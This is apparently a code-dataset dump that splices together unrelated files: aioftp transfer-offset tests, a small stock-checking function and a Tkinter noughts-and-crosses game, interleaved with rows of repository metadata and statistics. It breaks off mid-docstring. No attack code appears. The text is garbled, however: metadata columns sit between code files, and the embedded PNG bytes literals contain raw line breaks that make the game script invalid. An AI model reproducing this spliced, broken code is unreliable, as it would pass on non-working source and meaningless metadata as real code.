    """RETR with an offset past EOF must yield empty content."""
    tmp_file = tmp_dir / "foo.txt"
    with tmp_file.open(mode="w") as fout:
        fout.write("foobar")
    await client.login()
    async with client.download_stream("foo.txt", offset=100) as stream:
        r = await stream.read()
    await client.quit()
    tmp_file.unlink()
    nose.tools.eq_(r, b"")
@aioftp_setup(
    server_args=([(aioftp.User(base_path="tests/foo"),)], {}))
@with_connection
@with_tmp_dir("foo")
async def test_restart_stor_0(loop, client, server, *, tmp_dir):
    """STOR with offset 0 to a fresh path writes the payload verbatim."""
    tmp_file = tmp_dir / "foo.txt"
    await client.login()
    async with client.upload_stream("foo.txt", offset=0) as stream:
        await stream.write(b"foobar")
    await client.quit()
    with tmp_file.open(mode="rb") as fin:
        r = fin.read()
    tmp_file.unlink()
    nose.tools.eq_(r, b"foobar")
@aioftp_setup(
    server_args=([(aioftp.User(base_path="tests/foo"),)], {}))
@with_connection
@with_tmp_dir("foo")
async def test_restart_stor_3(loop, client, server, *, tmp_dir):
    """STOR with offset 3 overwrites from byte 3: "foobar" -> "foofoo"."""
    tmp_file = tmp_dir / "foo.txt"
    with tmp_file.open(mode="w") as fout:
        fout.write("foobar")
    await client.login()
    async with client.upload_stream("foo.txt", offset=3) as stream:
        await stream.write(b"foo")
    await client.quit()
    with tmp_file.open(mode="rb") as fin:
        r = fin.read()
    tmp_file.unlink()
    nose.tools.eq_(r, b"foofoo")
@aioftp_setup(
    server_args=([(aioftp.User(base_path="tests/foo"),)], {}))
@with_connection
@with_tmp_dir("foo")
async def test_restart_stor_10(loop, client, server, *, tmp_dir):
    """STOR with an offset past EOF zero-pads the gap (bytes 6..9)."""
    tmp_file = tmp_dir / "foo.txt"
    with tmp_file.open(mode="w") as fout:
        fout.write("foobar")
    await client.login()
    async with client.upload_stream("foo.txt", offset=10) as stream:
        await stream.write(b"foo")
    await client.quit()
    with tmp_file.open(mode="rb") as fin:
        r = fin.read()
    tmp_file.unlink()
    nose.tools.eq_(r, b"foobar" + b"\x00" * 4 + b"foo")
@aioftp_setup(
    server_args=([(aioftp.User(base_path="tests/foo"),)], {}))
@with_connection
@with_tmp_dir("foo")
async def test_restart_appe_10(loop, client, server, *, tmp_dir):
    """APPE with an explicit offset behaves like STOR+REST: zero-pads
    the gap past EOF and writes at the given position."""
    tmp_file = tmp_dir / "foo.txt"
    with tmp_file.open(mode="w") as fout:
        fout.write("foobar")
    await client.login()
    async with client.append_stream("foo.txt", offset=10) as stream:
        await stream.write(b"foo")
    await client.quit()
    with tmp_file.open(mode="rb") as fin:
        r = fin.read()
    tmp_file.unlink()
    nose.tools.eq_(r, b"foobar" + b"\x00" * 4 + b"foo")
@aioftp_setup(
    server_args=([(aioftp.User(base_path="tests/foo"),)], {}))
@with_connection
@with_tmp_dir("foo")
async def test_restart_reset(loop, client, server, *, tmp_dir):
    """A raw REST followed by a plain RETR still returns the whole
    file — i.e. the offset is apparently reset before the transfer
    (NOTE(review): inferred from the asserted value; confirm against
    the server's REST handling)."""
    tmp_file = tmp_dir / "foo.txt"
    with tmp_file.open(mode="w") as fout:
        fout.write("foobar")
    await client.login()
    await client.command("REST 3", "350")
    async with client.download_stream("foo.txt") as stream:
        r = await stream.read()
    await client.quit()
    tmp_file.unlink()
    nose.tools.eq_(r, b"foobar")
@aioftp_setup(
    server_args=([(aioftp.User(base_path="tests/foo"),)], {}))
@expect_codes_in_exception("501")
@with_connection
async def test_restart_syntax_error(loop, client, server):
    """REST with a non-numeric argument must be rejected with 501."""
    await client.login()
    await client.command("REST 3abc", "350")
| 22.563725
| 71
| 0.645883
| 684
| 4,603
| 4.141813
| 0.105263
| 0.066714
| 0.05083
| 0.058242
| 0.938581
| 0.938581
| 0.93258
| 0.894811
| 0.894811
| 0.894811
| 0
| 0.010473
| 0.190962
| 4,603
| 203
| 72
| 22.674877
| 0.750269
| 0.000869
| 0
| 0.790698
| 0
| 0
| 0.079617
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.023256
| 0
| 0.023256
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e75d282b9a5661fc6eb821b792676f6b758eebba
| 97
|
py
|
Python
|
python/8Kyu/Thinkful - Dictionary drills Order filler.py
|
athasv/Codewars-data
|
5e106466e709fd776f23585ad9f652d0d65b48d3
|
[
"MIT"
] | null | null | null |
python/8Kyu/Thinkful - Dictionary drills Order filler.py
|
athasv/Codewars-data
|
5e106466e709fd776f23585ad9f652d0d65b48d3
|
[
"MIT"
] | null | null | null |
python/8Kyu/Thinkful - Dictionary drills Order filler.py
|
athasv/Codewars-data
|
5e106466e709fd776f23585ad9f652d0d65b48d3
|
[
"MIT"
] | null | null | null |
def fillable(stock, merch, n):
    """Return True when *stock* holds at least *n* units of *merch*.

    A merch key absent from *stock* is never fillable — even for
    n <= 0 — matching the original membership-first check.
    """
    # The `True if ... else False` wrapper was redundant: the boolean
    # expression already evaluates to True/False.
    return merch in stock and stock[merch] >= n
| 48.5
| 66
| 0.71134
| 17
| 97
| 4.058824
| 0.705882
| 0.289855
| 0.318841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.195876
| 97
| 2
| 66
| 48.5
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
e784f4949ee2ccae14e498788b10c0653a6b09db
| 109,674
|
pyw
|
Python
|
Script/Noughts and Crosses.pyw
|
AniketWithPython/Noughts-and-Crosses
|
8402839d12b103efca979195d19899ec55ed4780
|
[
"TCL",
"MIT"
] | null | null | null |
Script/Noughts and Crosses.pyw
|
AniketWithPython/Noughts-and-Crosses
|
8402839d12b103efca979195d19899ec55ed4780
|
[
"TCL",
"MIT"
] | null | null | null |
Script/Noughts and Crosses.pyw
|
AniketWithPython/Noughts-and-Crosses
|
8402839d12b103efca979195d19899ec55ed4780
|
[
"TCL",
"MIT"
] | null | null | null |
#Noughts and Crosses (Tkinter Edition) By Aniket Maity
#Copyright 2021 Aniket Maity
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"),
#to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
#and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from tkinter import *
from webbrowser import open
# Turn tracker: l[0] is the mark placed on the next click; XO()
# reverses the two-element list after each move to alternate X and O.
l=["X","O"]
# Maps a button name ('b1'..'b9') to the mark ("X"/"O") placed on it.
status={}
# The eight winning lines of the 3x3 board, as button-name triples
# (three rows, three columns, two diagonals).
check=[['b1','b2','b3'],['b4','b5','b6'],['b7','b8','b9'],['b1','b4','b7'],['b2','b5','b8'],['b3','b6','b9'],['b1','b5','b9'],['b3','b5','b7']]
def button(a):
    """Game-over popup click handler.

    Destroys both the popup and the main window, exits the program
    when the choice is None (Quit), otherwise stores the reply in the
    module-global `rep` for winnerpop() to return.
    """
    global pop,rep,root
    pop.destroy()
    root.destroy()
    # None signals Quit/close; anything else ('yes') means play again.
    if a==None:
        raise SystemExit
    rep=a
def popfunc():
    """Window-manager close handler for the popup: end the program."""
    raise SystemExit()
def winnerpop(text):
global pop,rep,root
pop=Toplevel()
pop.grab_set()
photo=PhotoImage(data=b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x06\x00\x00\x00szz\xf4\x00\x00\x00\x01sRGB\x00\xae\xce\x1c\xe9\x00\x00\x00\x04gAMA\x00\x00\xb1\x8f\x0b\xfca\x05\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x03\x95IDATXG\xc5\x96Mh\x1ce\x18\xc7\x7f\xb3\xb3\xbb\xc9dw\xf3\xb5\xd9&-\xbb\xa9E\xd3\xc6|\xb4\x92\xd4\xaa\x8d6\xfd\x10\x0f\x96\x9e\xea\x07\xa8 "(\x08\x1e\xbc(\x1e\nz\x12\xf4\xeaI\xf4$\x14<)(\x05\xa1\x1aK\x9bP\x93\x1aL\xd36iRw\xdb\xa6\x9bd7\xd9uwv\xba\xdf\xb3\xe3\x1b:\x08{\xd0\xce\xab\r\xf9\xc10\x03\xf3\x7f\x99\xff\xbc\xef\xf3\xfcy\x14K\xc0\x16\xe2\xb2\xef[\xc6\x96\x1b\x90:\x82+\xd7\x16\xf1W\xce\xe1k\xa8RL\x17h\xdcy\x08\xb7\xe6GuY$\xaf\x9c#\xd8{\x8c\xa5\x95\x12{\x07\xfb\xed\x15\xf7G\xca\x80\xa2(\xc4&>\xa0b\xaca\xea\x15\xf4\xe5y\x9a\xbaz\xb99\x17e|"\xca\xa9o~\xc2\xd7\xda\x87LYI\x1f\xc1\xd2R\x95B1\x8cQm\xc4\x1d\x19!\x9d5\xd8\xd1\x13f{\x97\x86U)\xd9*\xe7H\x1bx\xf4\x89\x13$S\xeb\xa8\xc54_\x7fw\x19\xb3\xa1\x13\xb59\xc2\xc1#\xfbX[\xf8\xd5V9G\xda\x80\xbev\x9bO\xbe\x18\xe3\xcdO\x7f\xa1?l\xd1\x1c\xeaB\xed\xe8\xc3\xdb="\xce\xf3\xae\xadr\x8e\xb4\x81\xd6`\x07\xef\xbfs\x92\x03\xbb\xc3\xa0\xaa`\xd6\xc8\xa7\xd7\xb9\x9b^\xc10\xb2\xb6\xca9\xd2\x06JF\x9ap\xa7\x9bW_8L\xef\xc0^L\xd5\'\x8a\xaeL!~\x89\xb2n\xd8*\xe7Hw\x81\xb9>N\xe2\xe6\x149C\xc7\xb4T4_\x08\x852\xe5\xc4\x02\x91\xe1\x93h;F\xa5\xba`C\xfc7\xd3\xd3\xd3\x1b+7\xf5\x9a\x9a\x9a\xb2\xbfv\x0f\xe9\x1d\xb0\ng\xc9\'\x17\x11\xbd\x88\xd2\xfe4Z("\xde\xb8Y\x18;\xcd\xee#\xef\xde\xd3H\xec\x80\xfc\x11,\x7f\xce\xc2\xd5KxM\x0f\xa9\xd8<\xfe\xf0 
\xf1\xd8\x12\xe7\x7f\x9e\xe1\xe3o\'\x84&\xbc\xb9Atq\xfc\x1653B&\xafQmy\x84dr\x95\xb6\xf6\x06\x02-\xa2#j\x05[\xe5\x1ci\x03C\xcf\xbdA\xdb\xae!\x02\x9a\x97\xb9\x98N\xce\n\xe1\xed\xd8\xc3\xa1\xa3\xc3\xe4\xa23\xb6\xca9\xd2\x06<\x96\xce\x89WNqf\xd6b\xf0\xb1A\xba{\x87\xb1\x02\xbb\xf0l\x1f\xa6VN\xdb*\xe7H\x1bP5\x1fo\xbd|\x90\\b\x91\xf8\x9d;\xe43\tJ\xb9?\xc5}\x99L\xf2\x96\xadr\x8e\xb4\x01\xf2Y\x8e\xee\xdf\xc6\xf1\xc3=\xb4\xb7\xb8Q\xdd\x1e\xaa\xe5\x1cF\xf4\x02\xd5B\xde\x169G\xbe\r\xad?X\xbfv\x81D\xfc:\x96\xa2\xa1\xf9\xdb\xf0z\xdd\x88\xaf\x13\x19x\x06\xc5\xb7\xff\xbf\x07\xd1\xcc\xe5\xb9\x8d\x95\x9bz\xfdk\x10\xad\xde\xf8\x9ev\xbf\x88U\xbd\x8cg\xdb\x10\x9e\xe66\\.\x95\xcc\xe2EZ{\x9e\x15;\xd0x\xdf\xbf\xfb_A4;\xf6!>e\x9dj\xba\x88\x91\xbcM\x93\x08\x99D,\xce\xf9\xb1\xdfx\xef\xcb\x1f\xf0\x07\xf7=p\x03uE\x18\xbda\x90\xd7C\xe4j\xcdX\xc1>\xd6\x12+\x04\xda\xdd4\xb76b\x96\xe4\x0b\xcc\tu\x06\x06\x9e:.\x12\xaeDS%\xc5\xe93\x0b\xe4\xcc\x16\xdc-\xdd\x8c\x8c\n3\xd7\xe5\xa7\x1d\'\xd4\x19\xc8g\x92|\xf6\xd5Y^\xfc\xe8G\x86\x1fV\xe9\xec\xde\x89\x12\xec\xc7\xf3\xd0\xa8\x98|\xe5c\xd6\tu\x06|\x81\x00o\xbf\xf6\xbc\x98v"\xac\xa6\xc4xe\x8a\x014\x93\x12\x13O\x92\x9c\x08\x9b\xcd\xa0\xce@\xb9\x98\x13\xd3N\x03\xaf\xbft\x8c\xc7\x9f<@Ui\xda(S\x8a\x89\x19\x8aY\xddV=X\xea\x0c\xb8\\^jU\x03\xc5\x93\xa7R\xcd\x8b\xe7\x02V9+&\x1e\x8fh\xcb=\xfc>;o+\xff\x99\xc9\xc9I\xfb\xc9\x19RI\xb8\x19\xd4\xed\xc0V\xb0\xc5\x06\xe0/\t\x12\xef\xcd\xd8j\x93\xad\x00\x00\x00\x00IEND\xaeB`\x82')
pop.iconphoto(False,photo)
pop.geometry('300x150')
pop.title('GAME OVER!')
pop.configure(bg='#404040')
label=Label(master=pop,text=text,font=('Helvetica',20),bg='#404040',fg='white').pack(pady=5)
b01=Button(master=pop,text='Play Again!',font=('Helvetica',10),width=10,bg='#363636',fg='white',command=lambda m='yes':button(m)).pack(pady=10)
b02=Button(master=pop,text='Quit',font=('Helvetica',10),width=10,bg='#363636',fg='white',command=lambda m=None:button(m)).pack()
pop.protocol("WM_DELETE_WINDOW",popfunc)
pop.mainloop()
return rep
def XO(x):
    """Handle a click on board square *x* ('b1'..'b9').

    Places the current player's mark on that button, alternates the
    turn, then checks every winning triple and the tie condition,
    showing the game-over popup via winnerpop() when the game ends.
    """
    global l,status,root,check,winnerpop
    if x in status.keys():
        # Square already taken: ignore the click.
        return None
    else:
        # Resolve the Button widget stored under the global name `x`.
        globals()["b"]=globals()[x]
        t=l[0]
        # Reversing the two-element list alternates X and O turns.
        l.reverse()
        b.config(text=t,width=3,height=1,font=("Helvetica",42))
        status[x]=t
        # Scan each winning triple for three identical marks.
        for i in check:
            test=[]
            for j in i:
                try:
                    test.append(status[j])
                except:
                    # Square on this line not played yet (KeyError).
                    pass
            try:
                if test[0]==test[1]==test[2]:
                    # Highlight the winning line in red.
                    for k in i:
                        globals()["b"]=globals()[k]
                        b.config(fg="red")
                    reply=winnerpop(f"YAY {t} Won!🎉")
                    if reply=='yes':
                        # Reset the game state and start a new round.
                        status={}
                        l=["X","O"]
                        game()
                    else:
                        pass
            except SystemExit:
                # Propagate the Quit choice from the popup.
                raise SystemExit
            except:
                # Fewer than three marks on this line yet (IndexError).
                pass
        if len(status)==9:
            # Board full with no winner: declare a tie.
            reply=winnerpop("Tie!")
            if reply=='yes':
                status={}
                l=["X","O"]
                game()
            else:
                raise SystemExit
def game():
global root
global b1,b2,b3,b4,b5,b6,b7,b8,b9
root=Tk()
photo=PhotoImage(data=b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x06\x00\x00\x00szz\xf4\x00\x00\x00\x01sRGB\x00\xae\xce\x1c\xe9\x00\x00\x00\x04gAMA\x00\x00\xb1\x8f\x0b\xfca\x05\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x03\x95IDATXG\xc5\x96Mh\x1ce\x18\xc7\x7f\xb3\xb3\xbb\xc9dw\xf3\xb5\xd9&-\xbb\xa9E\xd3\xc6|\xb4\x92\xd4\xaa\x8d6\xfd\x10\x0f\x96\x9e\xea\x07\xa8 "(\x08\x1e\xbc(\x1e\nz\x12\xf4\xeaI\xf4$\x14<)(\x05\xa1\x1aK\x9bP\x93\x1aL\xd36iRw\xdb\xa6\x9bd7\xd9uwv\xba\xdf\xb3\xe3\x1b:\x08{\xd0\xce\xab\r\xf9\xc10\x03\xf3\x7f\x99\xff\xbc\xef\xf3\xfcy\x14K\xc0\x16\xe2\xb2\xef[\xc6\x96\x1b\x90:\x82+\xd7\x16\xf1W\xce\xe1k\xa8RL\x17h\xdcy\x08\xb7\xe6GuY$\xaf\x9c#\xd8{\x8c\xa5\x95\x12{\x07\xfb\xed\x15\xf7G\xca\x80\xa2(\xc4&>\xa0b\xaca\xea\x15\xf4\xe5y\x9a\xbaz\xb99\x17e|"\xca\xa9o~\xc2\xd7\xda\x87LYI\x1f\xc1\xd2R\x95B1\x8cQm\xc4\x1d\x19!\x9d5\xd8\xd1\x13f{\x97\x86U)\xd9*\xe7H\x1bx\xf4\x89\x13$S\xeb\xa8\xc54_\x7fw\x19\xb3\xa1\x13\xb59\xc2\xc1#\xfbX[\xf8\xd5V9G\xda\x80\xbev\x9bO\xbe\x18\xe3\xcdO\x7f\xa1?l\xd1\x1c\xeaB\xed\xe8\xc3\xdb="\xce\xf3\xae\xadr\x8e\xb4\x81\xd6`\x07\xef\xbfs\x92\x03\xbb\xc3\xa0\xaa`\xd6\xc8\xa7\xd7\xb9\x9b^\xc10\xb2\xb6\xca9\xd2\x06JF\x9ap\xa7\x9bW_8L\xef\xc0^L\xd5\'\x8a\xaeL!~\x89\xb2n\xd8*\xe7Hw\x81\xb9>N\xe2\xe6\x149C\xc7\xb4T4_\x08\x852\xe5\xc4\x02\x91\xe1\x93h;F\xa5\xba`C\xfc7\xd3\xd3\xd3\x1b+7\xf5\x9a\x9a\x9a\xb2\xbfv\x0f\xe9\x1d\xb0\ng\xc9\'\x17\x11\xbd\x88\xd2\xfe4Z("\xde\xb8Y\x18;\xcd\xee#\xef\xde\xd3H\xec\x80\xfc\x11,\x7f\xce\xc2\xd5KxM\x0f\xa9\xd8<\xfe\xf0 
\xf1\xd8\x12\xe7\x7f\x9e\xe1\xe3o\'\x84&\xbc\xb9Atq\xfc\x1653B&\xafQmy\x84dr\x95\xb6\xf6\x06\x02-\xa2#j\x05[\xe5\x1ci\x03C\xcf\xbdA\xdb\xae!\x02\x9a\x97\xb9\x98N\xce\n\xe1\xed\xd8\xc3\xa1\xa3\xc3\xe4\xa23\xb6\xca9\xd2\x06<\x96\xce\x89WNqf\xd6b\xf0\xb1A\xba{\x87\xb1\x02\xbb\xf0l\x1f\xa6VN\xdb*\xe7H\x1bP5\x1fo\xbd|\x90\\b\x91\xf8\x9d;\xe43\tJ\xb9?\xc5}\x99L\xf2\x96\xadr\x8e\xb4\x01\xf2Y\x8e\xee\xdf\xc6\xf1\xc3=\xb4\xb7\xb8Q\xdd\x1e\xaa\xe5\x1cF\xf4\x02\xd5B\xde\x169G\xbe\r\xad?X\xbfv\x81D\xfc:\x96\xa2\xa1\xf9\xdb\xf0z\xdd\x88\xaf\x13\x19x\x06\xc5\xb7\xff\xbf\x07\xd1\xcc\xe5\xb9\x8d\x95\x9bz\xfdk\x10\xad\xde\xf8\x9ev\xbf\x88U\xbd\x8cg\xdb\x10\x9e\xe66\\.\x95\xcc\xe2EZ{\x9e\x15;\xd0x\xdf\xbf\xfb_A4;\xf6!>e\x9dj\xba\x88\x91\xbcM\x93\x08\x99D,\xce\xf9\xb1\xdfx\xef\xcb\x1f\xf0\x07\xf7=p\x03uE\x18\xbda\x90\xd7C\xe4j\xcdX\xc1>\xd6\x12+\x04\xda\xdd4\xb76b\x96\xe4\x0b\xcc\tu\x06\x06\x9e:.\x12\xaeDS%\xc5\xe93\x0b\xe4\xcc\x16\xdc-\xdd\x8c\x8c\n3\xd7\xe5\xa7\x1d\'\xd4\x19\xc8g\x92|\xf6\xd5Y^\xfc\xe8G\x86\x1fV\xe9\xec\xde\x89\x12\xec\xc7\xf3\xd0\xa8\x98|\xe5c\xd6\tu\x06|\x81\x00o\xbf\xf6\xbc\x98v"\xac\xa6\xc4xe\x8a\x014\x93\x12\x13O\x92\x9c\x08\x9b\xcd\xa0\xce@\xb9\x98\x13\xd3N\x03\xaf\xbft\x8c\xc7\x9f<@Ui\xda(S\x8a\x89\x19\x8aY\xddV=X\xea\x0c\xb8\\^jU\x03\xc5\x93\xa7R\xcd\x8b\xe7\x02V9+&\x1e\x8fh\xcb=\xfc>;o+\xff\x99\xc9\xc9I\xfb\xc9\x19RI\xb8\x19\xd4\xed\xc0V\xb0\xc5\x06\xe0/\t\x12\xef\xcd\xd8j\x93\xad\x00\x00\x00\x00IEND\xaeB`\x82')
root.iconphoto(False,photo)
root.title("Noughts and Crosses")
root.geometry('324x347')
root.configure(bg='#363636')
b1=Button(root,width=13,height=7,bg='#363636',fg='white',activebackground='#363636',command=lambda m='b1':XO(m))
b1.grid(row=1,column=1)
b2=Button(root,width=13,height=7,bg='#363636',fg='white',activebackground='#363636',command=lambda m='b2':XO(m))
b2.grid(row=1,column=2)
b3=Button(root,width=13,height=7,bg='#363636',fg='white',activebackground='#363636',command=lambda m='b3':XO(m))
b3.grid(row=1,column=3)
b4=Button(root,width=13,height=7,bg='#363636',fg='white',activebackground='#363636',command=lambda m='b4':XO(m))
b4.grid(row=2,column=1)
b5=Button(root,width=13,height=7,bg='#363636',fg='white',activebackground='#363636',command=lambda m='b5':XO(m))
b5.grid(row=2,column=2)
b6=Button(root,width=13,height=7,bg='#363636',fg='white',activebackground='#363636',command=lambda m='b6':XO(m))
b6.grid(row=2,column=3)
b7=Button(root,width=13,height=7,bg='#363636',fg='white',activebackground='#363636',command=lambda m='b7':XO(m))
b7.grid(row=3,column=1)
b8=Button(root,width=13,height=7,bg='#363636',fg='white',activebackground='#363636',command=lambda m='b8':XO(m))
b8.grid(row=3,column=2)
b9=Button(root,width=13,height=7,bg='#363636',fg='white',activebackground='#363636',command=lambda m='b9':XO(m))
b9.grid(row=3,column=3)
root.mainloop()
def start():
    """Start-button callback: close the menu window and launch the game."""
    menu.destroy()
    game()
def tutorial():
    """Open a modal "Tutorial" window describing how to play the game.

    The window reuses the app's embedded PNG as its icon, shows the rules
    as wrapped label text, and offers a Close button. ``grab_set`` makes it
    modal until the user dismisses it.
    """
    tut=Toplevel()
    # Make the dialog modal: all input events are routed to this window
    # until it is destroyed.
    tut.grab_set()
    tut.title("Tutorial")
    # Embedded PNG icon data (the same 32x32 artwork used by every window
    # in this app).
    # NOTE(review): the bytes literal below contains a raw line break,
    # which looks like paste/export damage rather than intent -- confirm
    # against the original source before reformatting this block.
    photo=PhotoImage(data=b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00 \x00\x00\x00 \x08\x06\x00\x00\x00szz\xf4\x00\x00\x00\x01sRGB\x00\xae\xce\x1c\xe9\x00\x00\x00\x04gAMA\x00\x00\xb1\x8f\x0b\xfca\x05\x00\x00\x00\tpHYs\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95+\x0e\x1b\x00\x00\x03\x95IDATXG\xc5\x96Mh\x1ce\x18\xc7\x7f\xb3\xb3\xbb\xc9dw\xf3\xb5\xd9&-\xbb\xa9E\xd3\xc6|\xb4\x92\xd4\xaa\x8d6\xfd\x10\x0f\x96\x9e\xea\x07\xa8 "(\x08\x1e\xbc(\x1e\nz\x12\xf4\xeaI\xf4$\x14<)(\x05\xa1\x1aK\x9bP\x93\x1aL\xd36iRw\xdb\xa6\x9bd7\xd9uwv\xba\xdf\xb3\xe3\x1b:\x08{\xd0\xce\xab\r\xf9\xc10\x03\xf3\x7f\x99\xff\xbc\xef\xf3\xfcy\x14K\xc0\x16\xe2\xb2\xef[\xc6\x96\x1b\x90:\x82+\xd7\x16\xf1W\xce\xe1k\xa8RL\x17h\xdcy\x08\xb7\xe6GuY$\xaf\x9c#\xd8{\x8c\xa5\x95\x12{\x07\xfb\xed\x15\xf7G\xca\x80\xa2(\xc4&>\xa0b\xaca\xea\x15\xf4\xe5y\x9a\xbaz\xb99\x17e|"\xca\xa9o~\xc2\xd7\xda\x87LYI\x1f\xc1\xd2R\x95B1\x8cQm\xc4\x1d\x19!\x9d5\xd8\xd1\x13f{\x97\x86U)\xd9*\xe7H\x1bx\xf4\x89\x13$S\xeb\xa8\xc54_\x7fw\x19\xb3\xa1\x13\xb59\xc2\xc1#\xfbX[\xf8\xd5V9G\xda\x80\xbev\x9bO\xbe\x18\xe3\xcdO\x7f\xa1?l\xd1\x1c\xeaB\xed\xe8\xc3\xdb="\xce\xf3\xae\xadr\x8e\xb4\x81\xd6`\x07\xef\xbfs\x92\x03\xbb\xc3\xa0\xaa`\xd6\xc8\xa7\xd7\xb9\x9b^\xc10\xb2\xb6\xca9\xd2\x06JF\x9ap\xa7\x9bW_8L\xef\xc0^L\xd5\'\x8a\xaeL!~\x89\xb2n\xd8*\xe7Hw\x81\xb9>N\xe2\xe6\x149C\xc7\xb4T4_\x08\x852\xe5\xc4\x02\x91\xe1\x93h;F\xa5\xba`C\xfc7\xd3\xd3\xd3\x1b+7\xf5\x9a\x9a\x9a\xb2\xbfv\x0f\xe9\x1d\xb0\ng\xc9\'\x17\x11\xbd\x88\xd2\xfe4Z("\xde\xb8Y\x18;\xcd\xee#\xef\xde\xd3H\xec\x80\xfc\x11,\x7f\xce\xc2\xd5KxM\x0f\xa9\xd8<\xfe\xf0 
\xf1\xd8\x12\xe7\x7f\x9e\xe1\xe3o\'\x84&\xbc\xb9Atq\xfc\x1653B&\xafQmy\x84dr\x95\xb6\xf6\x06\x02-\xa2#j\x05[\xe5\x1ci\x03C\xcf\xbdA\xdb\xae!\x02\x9a\x97\xb9\x98N\xce\n\xe1\xed\xd8\xc3\xa1\xa3\xc3\xe4\xa23\xb6\xca9\xd2\x06<\x96\xce\x89WNqf\xd6b\xf0\xb1A\xba{\x87\xb1\x02\xbb\xf0l\x1f\xa6VN\xdb*\xe7H\x1bP5\x1fo\xbd|\x90\\b\x91\xf8\x9d;\xe43\tJ\xb9?\xc5}\x99L\xf2\x96\xadr\x8e\xb4\x01\xf2Y\x8e\xee\xdf\xc6\xf1\xc3=\xb4\xb7\xb8Q\xdd\x1e\xaa\xe5\x1cF\xf4\x02\xd5B\xde\x169G\xbe\r\xad?X\xbfv\x81D\xfc:\x96\xa2\xa1\xf9\xdb\xf0z\xdd\x88\xaf\x13\x19x\x06\xc5\xb7\xff\xbf\x07\xd1\xcc\xe5\xb9\x8d\x95\x9bz\xfdk\x10\xad\xde\xf8\x9ev\xbf\x88U\xbd\x8cg\xdb\x10\x9e\xe66\\.\x95\xcc\xe2EZ{\x9e\x15;\xd0x\xdf\xbf\xfb_A4;\xf6!>e\x9dj\xba\x88\x91\xbcM\x93\x08\x99D,\xce\xf9\xb1\xdfx\xef\xcb\x1f\xf0\x07\xf7=p\x03uE\x18\xbda\x90\xd7C\xe4j\xcdX\xc1>\xd6\x12+\x04\xda\xdd4\xb76b\x96\xe4\x0b\xcc\tu\x06\x06\x9e:.\x12\xaeDS%\xc5\xe93\x0b\xe4\xcc\x16\xdc-\xdd\x8c\x8c\n3\xd7\xe5\xa7\x1d\'\xd4\x19\xc8g\x92|\xf6\xd5Y^\xfc\xe8G\x86\x1fV\xe9\xec\xde\x89\x12\xec\xc7\xf3\xd0\xa8\x98|\xe5c\xd6\tu\x06|\x81\x00o\xbf\xf6\xbc\x98v"\xac\xa6\xc4xe\x8a\x014\x93\x12\x13O\x92\x9c\x08\x9b\xcd\xa0\xce@\xb9\x98\x13\xd3N\x03\xaf\xbft\x8c\xc7\x9f<@Ui\xda(S\x8a\x89\x19\x8aY\xddV=X\xea\x0c\xb8\\^jU\x03\xc5\x93\xa7R\xcd\x8b\xe7\x02V9+&\x1e\x8fh\xcb=\xfc>;o+\xff\x99\xc9\xc9I\xfb\xc9\x19RI\xb8\x19\xd4\xed\xc0V\xb0\xc5\x06\xe0/\t\x12\xef\xcd\xd8j\x93\xad\x00\x00\x00\x00IEND\xaeB`\x82')
    tut.iconphoto(False,photo)
    tut.configure(bg='#404040')
    # Rules text shown to the player (runtime string, kept verbatim).
    text='''Noughts and crosses is a paper-and-pencil game for two players who take turns marking the spaces in a three-by-three grid with X or O. The player who succeeds in placing three of their marks in a horizontal, vertical, or diagonal row is the winner.
To play the game, the first player clicks on the desired box to place an 'X'. Then the next player places an 'O'.'''
    # NOTE(review): .pack() returns None, so `label` and `b01` end up None;
    # harmless here because neither variable is used afterwards.
    label=Label(master=tut,text=text,font=('Calibri',15),wraplength=500,bg='#404040',fg='white').pack()
    b01=Button(master=tut,text='Close',font=('Helvetica',10),width=10,bg='#363636',fg='white',command=tut.destroy).pack(pady=5)
    # mainloop() on a Toplevel drives the same Tk event loop as the root;
    # it returns once the window is dismissed.
    tut.mainloop()
def license():
    """Open a modal "License" window displaying the MIT license text.

    Mirrors tutorial(): embedded PNG icon, wrapped label text, and a Close
    button; ``grab_set`` makes the window modal until dismissed.

    NOTE(review): this function shadows the builtin ``license``; the name
